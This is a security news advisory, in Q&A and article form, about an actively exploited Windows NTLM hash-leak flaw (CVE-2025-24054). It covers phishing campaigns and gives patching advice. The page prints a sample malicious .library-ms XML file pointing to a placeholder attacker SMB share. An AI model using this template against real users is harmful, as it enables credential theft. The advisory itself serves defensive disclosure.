What vulnerability is CheckPoint reporting about NTLM hash leakage?

CheckPoint is reporting active exploitation of a security vulnerability tracked as CVE-2025-24054 (CVSS score 6.5), which allows attackers to leak NTLM hashes via spoofing through maliciously crafted .library-ms files.

What are the security risks of this vulnerability?

Exploitation of this vulnerability can lead to theft of user credentials that can be reused in hash replay attacks, potentially allowing attackers to gain unauthorized access to systems and data.

What malicious files were used in these attacks?

The malicious archives contained multiple files designed to leak NTLM hashes: xd.library-ms (exploiting CVE-2025-24054), xd.url (exploiting CVE-2024-43451, a similar previously patched vulnerability), xd.website (a file that can trigger SMB connections), and xd.lnk (a shortcut pointing to a malicious network resource).

How can organizations mitigate this vulnerability?

Microsoft has released patches as part of the March 2025 security updates. Organizations are strongly advised to install these updates immediately and consider disabling NTLM authentication if not required.

Attack

Microsoft NTLM hash disclosure vulnerability now actively exploited

Q: How does CVE-2025-24054 work?

The vulnerability enables unauthorized disclosure of NTLM (New Technology LAN Manager) hashes with minimal user interaction. When exploited, Windows Explorer initiates an SMB authentication request to a remote server controlled by attackers, leaking the user's NTLM hash. This can occur through simple actions such as extracting a ZIP archive containing the malicious file, navigating to a folder containing the malicious file, right-clicking on the file and even dragging and dropping the file.

Q: Have there been any real-world attacks using this vulnerability?

Yes, Check Point Research has reported multiple campaigns leveraging this vulnerability. A notable campaign occurred around March 20-21, 2025, targeting government and private institutions in Poland and Romania. The attackers used phishing emails containing Dropbox links to malicious archives. Later campaigns discovered on March 25, 2025, distributed unarchived .library-ms files directly as email attachments.

published: April 18, 2025

Take action: If you needed a reason to update your Windows, how about getting hacked by simply right-clicking or drag and drop of a simple file? Don't delay, patching is not that hard.

Learn More

CheckPoint is reporting active exploitation of a security vulnerability, which allows attackers to leak NTLM hashes via spoofing through maliciously crafted .library-ms files.

The vulnerability is tracked as CVE-2025-24054 (CVSS score 6.5) and enables unauthorized disclosure of NTLM (New Technology LAN Manager) hashes with minimal user interaction. When exploited, Windows Explorer initiates an SMB authentication request to a remote server controlled by attackers, leaking the user's NTLM hash. This can occur through simple actions such as extracting a ZIP archive containing the malicious file, navigating to a folder containing the malicious file, right-clicking on the file and even dragging and dropping the file.

Exploitation of this vulnerability can lead theft of user credentials that can be reused as hash replay attacks

Check Point Research has reported multiple campaigns leveraging this vulnerability. A notable campaign occurred around March 20-21, 2025, targeting government and private institutions in Poland and Romania. The attackers used phishing emails containing Dropbox links to malicious archives.

The malicious archives contained multiple files designed to leak NTLM hashes:

xd.library-ms - Exploiting CVE-2025-24054
xd.url - Exploiting CVE-2024-43451 (a similar previously patched vulnerability)
xd.website - A file that can trigger SMB connections
xd.lnk - A shortcut pointing to a malicious network resource

Later campaigns discovered on March 25, 2025, distributed unarchived .library-ms files directly as email attachments. In these cases, merely downloading the file was sufficient to trigger the exploit.

The malicious .library-ms files contain XML code pointing to attacker-controlled SMB servers:

<?xml version="1.0" encoding="UTF-8"?> 
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"> 
    <searchConnectorDescriptionList> 
    <searchConnectorDescription>
     <simpleLocation> 
       <url>\\ATTACKER_IP\SHARE_NAME</url> 
     </simpleLocation> 
   </searchConnectorDescription> 
  </searchConnectorDescriptionList> 
</libraryDescription>

When triggered, Windows attempts to connect to the specified SMB server, sending the user's NTLMv2-SSP hash in the process.

This vulnerability affects all recent Windows versions. Microsoft has released patches as part of the March 2025 security updates.

Organizations are strongly advised to install the March 2025 security updates immediately and consider disabling NTLM authentication if not required.

Microsoft NTLM hash disclosure vulnerability now actively exploited

Read More
Critical vulnerability in CrushFTP actively exploited
Critical Fortinet vulnerability actively exploited
Adobe Reader Zero-Day Exploited in Targeted Fingerprinting Campaign
CISA reports active exploitation of SonicWall SMA 100 …
TrueConf Zero-Day Exploited in Targeted Government Attacks